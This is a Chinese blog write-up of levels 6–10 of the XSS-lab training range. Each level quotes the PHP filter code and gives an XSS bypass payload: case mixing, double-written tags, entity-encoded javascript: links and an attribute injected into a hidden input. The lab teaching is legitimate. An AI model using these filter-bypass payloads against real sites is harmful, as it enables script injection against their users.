XSS-lab靶场（6~10）

Level 6

这里我们就省去黑盒测试的步骤了，直接来看看源码吧：

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword  value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>

虽然看起来过滤的还不错，但是相较于前一题，这里并没有strtolower()，所以使用大小写混写就可以了。
payload:

"><SCRIPT>alert('xss')</SCRIPT>

在这里插入图片描述

Level 7

后面我们都会截取关键源码，不会再全部截取了。

$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);

这里有了转小写，但是这里的替换函数是将目标替换为了空，那么显然我们可以使用双写的方法绕过。
所以这里的payload都是可用的，看你，只是需要双写。

"><scrscriptipt>alert('xss')</scrscriptipt>

在这里插入图片描述

Level 8

这里，已经转变为添加超链接了。
看一下它是如何工作的：
在这里插入图片描述
就是将我们input当中的内容添加到下面a的href属性当中去。
关键源码：

$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

这里已经是相当好的屏蔽了，但是是由于可以让所写内容写在外部，我们可以使用html实体编码

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)

给出一个实体编码的网址：
https://www.qqxiuzi.cn/bianma/zifushiti.php

但是实体编码是无法对标签使用的。
在这里插入图片描述

Level 9

相对于上一关，这里多出了一段脚本如下：

if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法？有没有！">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}

这里还会对内容进行检查，更加严格些了
但是又因为仅仅是检查是否含有，我们可以将这个关键的字符串放在对于我们无关紧要的地方，如提示话语包含这个就行了
payload:

java&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert('http://i am hack!');

在这里插入图片描述

Level 10

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link"  value="'.'" type="hidden">
<input name="t_history"  value="'.'" type="hidden">
<input name="t_sort"  value="'.$str33.'" type="hidden">
</form>
</center>';
?>

这里是表单隐藏，对于keyword参数，是非常难进行攻击的，因为这里转实体化且双引号闭合。这里攻击的关键就是利用这个隐藏的input标签，较为进阶的input标签利用，对于t_sort，做了两次过滤

这里给出引用 accesskey属性，

accesskey 属性规定激活（使元素获得焦点）元素的快捷键。

也就是说，加上这个属性，我们就可以使用快捷键来定位出该元素，更加准确（如果直接看不出来元素的话）

在这里，其实就是要去掉隐藏属性，当input标签同时拥有两个属性，可见和不可见时，会处理为可见，所以只需要再次调一下这个标签的type属性即可

" οnclick="alert(123)" type="text

在这里插入图片描述

posted @ 2022-06-18 17:05 Sayo-NERV 阅读(59) 评论(0) 编辑收藏举报

刷新页面返回顶部

Sayo-NERV

XSS-lab靶场（6~10）

Level 6

Level 7

Level 8

Level 9

Level 10

公告